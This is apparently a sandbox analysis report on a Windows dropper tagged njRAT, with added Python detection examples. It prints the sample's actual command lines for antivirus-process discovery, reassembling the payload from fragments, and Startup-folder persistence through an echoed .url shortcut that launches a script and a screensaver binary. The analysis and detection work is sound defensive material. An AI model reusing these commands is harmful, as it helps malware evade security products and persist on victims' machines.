
Windows Analysis Report
PkContent.exe

Overview

General Information

Sample name: PkContent.exe
Analysis ID: 1577543
MD5: 87c051a77edc0cc77a4d791ef72367d1
SHA1: 5d5bab642235f0af7d9afe3cacec5ae2a4cfc8e5
SHA256: b63bf28780e02bf0bb1bb59dec135e6263f4c582724c95eee0519b279022f31c
Tags: 18521511316 185215113209 bulletproof exe njrat user-abus3reports

Detection

Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
AI detected suspicious sample
Drops PE files with a suspicious file extension
Machine Learning detection for sample
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • PkContent.exe (PID: 6340 cmdline: "C:\Users\user\Desktop\PkContent.exe" MD5: 87C051A77EDC0CC77A4D791EF72367D1)
    • cmd.exe (PID: 2628 cmdline: "C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 5440 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6812 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 1464 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6328 cmdline: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 2024 cmdline: cmd /c md 724598 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 5912 cmdline: findstr /V "WowLiberalCalOfficer" Weight MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 1352 cmdline: cmd /c copy /b ..\Explorer + ..\West + ..\Agencies + ..\Situated y MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Thermal.pif (PID: 1648 cmdline: Thermal.pif y MD5: 18CE19B57F43CE0A5AF149C96AECC685)
        • cmd.exe (PID: 5732 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & echo URL="C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 6960 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 1920 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • HermesKey.scr (PID: 2196 cmdline: "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr" "C:\Users\user\AppData\Local\GuardKey Solutions\g" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
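The tree above is the whole chain in one view: PkContent.exe (the nsis.sf.net error string found in it points to an NSIS installer) drops a batch file and renames it with `move Hammer Hammer.bat`; the batch greps `tasklist` output for security-product process names, rebuilds the payload from several fragments with `copy /b`, and runs it as Thermal.pif (strings referencing autoitscript.com and a SHA256 identical to the later HermesKey.scr); Thermal.pif then writes an InternetShortcut `.url` into the Startup folder pointing at HermesKey.js, which wscript.exe runs and which in turn launches HermesKey.scr. The Python below is an added example and not part of the Joe Sandbox report: it runs the checks a detection engineer would derive from this tree over constructed process-creation records modelled on it. The record layout (pid, ppid, image, command line) is an assumption; the security-product names are the ones from the findstr command lines in the report.

```python
"""Detection logic for the behaviours shown in the process tree above, run
over constructed process-creation records (added example, not Joe Sandbox code)."""
import re

# Process names the sample greps for with `tasklist | findstr /I`; taken from
# the findstr command lines in the report. Extend with your own AV/EDR names.
AV_PROCESS_NAMES = {"wrsa", "opssvc", "avastui", "avgui", "bdservicehost",
                    "nswscsvc", "sophoshealth"}
# PE executables with extensions that are rarely launched from a user profile.
SUSPICIOUS_EXTS = (".pif", ".scr", ".com")
STARTUP_DIR = "\\start menu\\programs\\startup\\"
FINDSTR_CASE_INSENSITIVE = re.compile(r"(^|\s)/i(\s|$)", re.I)

# Constructed records (pid, ppid, image, command line) mirroring the tree;
# the field layout is an assumption, not a particular EDR's schema.
SAMPLE_EVENTS = [
    (6340, 4056, r"C:\Users\user\Desktop\PkContent.exe", r'"C:\Users\user\Desktop\PkContent.exe"'),
    (2628, 6340, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.bat'),
    (6388, 2628, r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    (5440, 2628, r"C:\Windows\SysWOW64\tasklist.exe", "tasklist"),
    (6812, 2628, r"C:\Windows\SysWOW64\findstr.exe", 'findstr /I "wrsa opssvc"'),
    (1464, 2628, r"C:\Windows\SysWOW64\tasklist.exe", "tasklist"),
    (6328, 2628, r"C:\Windows\SysWOW64\findstr.exe", 'findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"'),
    (2024, 2628, r"C:\Windows\SysWOW64\cmd.exe", "cmd /c md 724598"),
    (5912, 2628, r"C:\Windows\SysWOW64\findstr.exe", 'findstr /V "WowLiberalCalOfficer" Weight'),
    (1352, 2628, r"C:\Windows\SysWOW64\cmd.exe", r"cmd /c copy /b ..\Explorer + ..\West + ..\Agencies + ..\Situated y"),
    (1648, 2628, r"C:\Users\user\AppData\Local\Temp\724598\Thermal.pif", "Thermal.pif y"),
    (5732, 1648, r"C:\Windows\SysWOW64\cmd.exe",
     r'cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url"'
     r' & echo URL="C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" >> '
     r'"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & exit'),
    (6960, 2628, r"C:\Windows\SysWOW64\choice.exe", "choice /d y /t 5"),
    (1920, 4056, r"C:\Windows\System32\wscript.exe",
     r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js"'),
    (2196, 1920, r"C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr",
     r'"C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr" "C:\Users\user\AppData\Local\GuardKey Solutions\g"'),
]


def _basename(image):
    return image.rsplit("\\", 1)[-1].lower()


def analyse(events):
    """Return (pid, finding, detail) tuples for every record that matches a check."""
    children = {}
    for ev in events:
        children.setdefault(ev[1], []).append(ev)
    findings = []
    for pid, ppid, image, cmd in events:
        base, low = _basename(image), cmd.lower()
        # 1. Security-product discovery: findstr /I "<names>" with a tasklist sibling.
        if base == "findstr.exe" and FINDSTR_CASE_INSENSITIVE.search(cmd):
            terms = set(" ".join(re.findall(r'"([^"]*)"', cmd)).lower().split())
            hits = terms & AV_PROCESS_NAMES
            has_tasklist = any(_basename(c[2]) == "tasklist.exe" for c in children.get(ppid, []))
            if hits and has_tasklist:
                findings.append((pid, "av_discovery", sorted(hits)))
        # 2. Payload rebuilt from fragments with `copy /b a + b + c out`.
        if base == "cmd.exe" and "copy /b" in low and low.count(" + ") >= 2:
            findings.append((pid, "fragment_concatenation", low.count(" + ") + 1))
        # 3. .pif/.scr/.com executed from a user-writable location.
        if base.endswith(SUSPICIOUS_EXTS) and ("\\appdata\\" in image.lower() or "\\temp\\" in image.lower()):
            findings.append((pid, "suspicious_extension_exec", base))
        # 4. Startup persistence via an echoed [InternetShortcut] .url file.
        if "[internetshortcut]" in low and STARTUP_DIR in low:
            m = re.search(r'url="?([^"&]+)"?', cmd, re.I)
            findings.append((pid, "startup_url_persistence", m.group(1).strip() if m else ""))
        # 5. Windows Script Host launching a dropped screensaver/PIF binary.
        if base == "wscript.exe":
            for c in children.get(pid, []):
                if _basename(c[2]).endswith(SUSPICIOUS_EXTS):
                    findings.append((pid, "wsh_spawns_suspicious_ext", c[0]))
    return findings


if __name__ == "__main__":
    for pid, kind, detail in analyse(SAMPLE_EVENTS):
        print(f"pid {pid}: {kind} -> {detail}")
```

Check 1 deliberately requires the `tasklist` sibling so a lone `findstr /I` over a text file does not fire; check 3 keys on the image path rather than the command line because the batch launches `Thermal.pif y` with a bare relative name.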
No configs have been found
No yara matches

System Summary

Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js", ProcessId: 1920, ProcessName: wscript.exe
Source: Process started; Author: Max Altgelt (Nextron Systems); Data: Command: Thermal.pif y, CommandLine: Thermal.pif y, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2628, ParentProcessName: cmd.exe, ProcessCommandLine: Thermal.pif y, ProcessId: 1648, ProcessName: Thermal.pif
Source: File created; Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io; Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif, ProcessId: 1648, TargetFilename: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif, ProcessId: 1648, TargetFilename: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js", ProcessId: 1920, ProcessName: wscript.exe

Data Obfuscation

Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 5732, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url
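The Startup entry is a plain InternetShortcut file in INI form, written line by line with `echo`, so the file on disk carries a trailing space after the section header and literal double quotes around the URL value; a parser that expects a clean `.url` will miss it. The Python below is an added example, not code from the report or from Joe Sandbox: it parses such a file tolerant of those quirks and classifies the target, flagging local script or PE targets inside the user profile, which is the shape of the persistence seen here (wscript.exe later runs HermesKey.js from that path). The sample text and extension lists are constructed for the example, and scan_startup_dir is a convenience over a directory you supply.

```python
"""Triage InternetShortcut (.url) files dropped into a Startup folder.
Added example; sample content is constructed to match the echo commands above."""
import re
from pathlib import Path, PureWindowsPath

# Exactly what the two echo commands produce: trailing space after the header,
# literal quotes around the value, CRLF line endings (constructed sample).
SAMPLE_URL_FILE = ('[InternetShortcut] \r\n'
                   'URL="C:\\Users\\user\\AppData\\Local\\GuardKey Solutions\\HermesKey.js" \r\n')

SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta", ".ps1", ".bat", ".cmd"}
BINARY_EXTS = {".exe", ".scr", ".pif", ".com", ".dll"}


def parse_internet_shortcut(text):
    """Return the key/value pairs of the [InternetShortcut] section, lower-cased keys,
    with surrounding whitespace and quotes stripped from values."""
    section, values = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section == "internetshortcut" and "=" in line:
            key, value = line.split("=", 1)
            values[key.strip().lower()] = value.strip().strip('"')
    return values


def classify_target(url):
    """Decide whether URL= points at a web address or a local file, and what kind."""
    u = url.strip()
    if u.lower().startswith("file:///"):          # file:///C:/x/y.js -> C:\x\y.js
        u = u[8:].replace("/", "\\")
    is_local = bool(re.match(r"^[a-zA-Z]:\\", u)) or u.startswith("\\\\")
    if not is_local:
        return {"local": False, "verdict": "web-link"}
    p = PureWindowsPath(u)
    ext = p.suffix.lower()
    in_user_profile = "\\users\\" in u.lower() or "\\appdata\\" in u.lower()
    if ext in SCRIPT_EXTS:
        verdict = "script-launcher"
    elif ext in BINARY_EXTS:
        verdict = "binary-launcher"
    else:
        verdict = "local-file"
    return {"local": True, "path": str(p), "ext": ext,
            "in_user_profile": in_user_profile, "verdict": verdict}


def triage_url_file(text):
    values = parse_internet_shortcut(text)
    if "url" not in values:
        return {"local": False, "verdict": "no-url"}
    return classify_target(values["url"])


def scan_startup_dir(directory):
    """Triage every .url file in a directory (e.g. the per-user Startup folder)."""
    return [(str(f), triage_url_file(f.read_text(errors="replace")))
            for f in Path(directory).glob("*.url")]


if __name__ == "__main__":
    print(triage_url_file(SAMPLE_URL_FILE))
```

A `.url` whose target is a local `.js`, `.vbs` or `.scr` inside the user profile has no legitimate reason to sit in a Startup folder; a link to an `https://` address is the normal case and is left at "web-link".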

HIPS / PFW / Operating System Protection Evasion

Source: Process started; Author: Joe Security; Data: Command: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth", CommandLine: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth", CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2628, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth", ProcessId: 6328, ProcessName: findstr.exe
No Suricata rule has matched


AV Detection

Source: PkContent.exe; Avira: detected
Source: PkContent.exe; ReversingLabs: Detection: 63%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 96.8% probability
Source: PkContent.exe; Joe Sandbox ML: detected
Source: PkContent.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: PkContent.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\PkContent.exe; Code function: 0_2_004062D5 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\PkContent.exe; Code function: 0_2_00402E18 FindFirstFileW
Source: C:\Users\user\Desktop\PkContent.exe; Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif; Code function: 12_2_00184005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif; Code function: 12_2_0018494A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif; Code function: 12_2_00183CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif; Code function: 12_2_0018C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif; Code function: 12_2_0018CD14 FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif; Code function: 12_2_0018CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif; Code function: 12_2_0018F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif; Code function: 12_2_0018F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif; Code function: 12_2_0018FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr; Code function: 18_2_00074005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr; Code function: 18_2_0007494A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr; Code function: 18_2_0007C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr; Code function: 18_2_0007CD14 FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr; Code function: 18_2_0007CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr; Code function: 18_2_0007F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr; Code function: 18_2_0007F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr; Code function: 18_2_0007FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr; Code function: 18_2_00073CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user~1\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user~1\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user~1\AppData\Local\Temp\724598\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user~1\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user~1\AppData\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user~1\AppData\Local\Temp\724598
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (3 events)
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif; Code function: 12_2_001929BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile
Source: global traffic; DNS traffic detected: DNS query: ctIHfwPuGQOYqdJrz.ctIHfwPuGQOYqdJrz
Source: PkContent.exe, 00000000.00000003.1312253060.0000000002754000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000003.1368352365.0000000003D0A000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000002.2556840478.0000000001472000.00000004.00000020.00020000.00000000.sdmp, Ought.0.dr, Thermal.pif.3.dr, HermesKey.scr.12.dr; String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: PkContent.exe, 00000000.00000003.1312253060.0000000002754000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000003.1368352365.0000000003D0A000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000002.2556840478.0000000001472000.00000004.00000020.00020000.00000000.sdmp, Ought.0.dr, Thermal.pif.3.dr, HermesKey.scr.12.dr; String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: PkContent.exe, 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp, PkContent.exe, 00000000.00000003.1312253060.0000000002754000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000003.1368352365.0000000003D0A000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000002.2556840478.0000000001472000.00000004.00000020.00020000.00000000.sdmp, Ought.0.dr, Thermal.pif.3.dr, HermesKey.scr.12.dr; String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: PkContent.exe, 00000000.00000003.1312253060.0000000002754000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000003.1368352365.0000000003D0A000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000002.2556840478.0000000001472000.00000004.00000020.00020000.00000000.sdmp, Ought.0.dr, Thermal.pif.3.dr, HermesKey.scr.12.dr; String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: PkContent.exe; String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: PkContent.exe, 00000000.00000003.1312253060.0000000002754000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000003.1368352365.0000000003D0A000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000002.2556840478.0000000001472000.00000004.00000020.00020000.00000000.sdmp, Ought.0.dr, Thermal.pif.3.dr, HermesKey.scr.12.dr; String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: PkContent.exe, 00000000.00000003.1312253060.0000000002754000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000003.1368352365.0000000003D0A000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000002.2556840478.0000000001472000.00000004.00000020.00020000.00000000.sdmp, Ought.0.dr, Thermal.pif.3.dr, HermesKey.scr.12.dr; String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: PkContent.exe, 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp, PkContent.exe, 00000000.00000003.1312253060.0000000002754000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000003.1368352365.0000000003D0A000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000002.2556840478.0000000001472000.00000004.00000020.00020000.00000000.sdmp, Ought.0.dr, Thermal.pif.3.dr, HermesKey.scr.12.dr; String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: PkContent.exe, 00000000.00000003.1312253060.0000000002754000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000003.1368352365.0000000003D0A000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000002.2556840478.0000000001472000.00000004.00000020.00020000.00000000.sdmp, Ought.0.dr, Thermal.pif.3.dr, HermesKey.scr.12.dr; String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: PkContent.exe, 00000000.00000003.1312253060.0000000002754000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000003.1368352365.0000000003D0A000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000002.2556840478.0000000001472000.00000004.00000020.00020000.00000000.sdmp, Ought.0.dr, Thermal.pif.3.dr, HermesKey.scr.12.dr; String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: PkContent.exe, 00000000.00000003.1312253060.0000000002754000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000003.1368352365.0000000003D0A000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp, HermesKey.scr, 00000012.00000000.1496285640.00000000000D9000.00000002.00000001.01000000.0000000A.sdmp, Ought.0.dr, Thermal.pif.3.dr, HermesKey.scr.12.dr; String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: PkContent.exe, 00000000.00000003.1312253060.0000000002754000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000003.1368352365.0000000003D0A000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000002.2556840478.0000000001472000.00000004.00000020.00020000.00000000.sdmp, Ought.0.dr, Thermal.pif.3.dr, HermesKey.scr.12.dr; String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: HermesKey.scr.12.dr; String found in binary or memory: https://www.globalsign.com/repository/0
Source: PkContent.exe, 00000000.00000003.1312253060.0000000002754000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000003.1368352365.0000000003D0A000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000002.2556840478.0000000001472000.00000004.00000020.00020000.00000000.sdmp, Ought.0.dr, Thermal.pif.3.dr, HermesKey.scr.12.dr; String found in binary or memory: https://www.globalsign.com/repository/06
Source: C:\Users\user\Desktop\PkContent.exe; Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
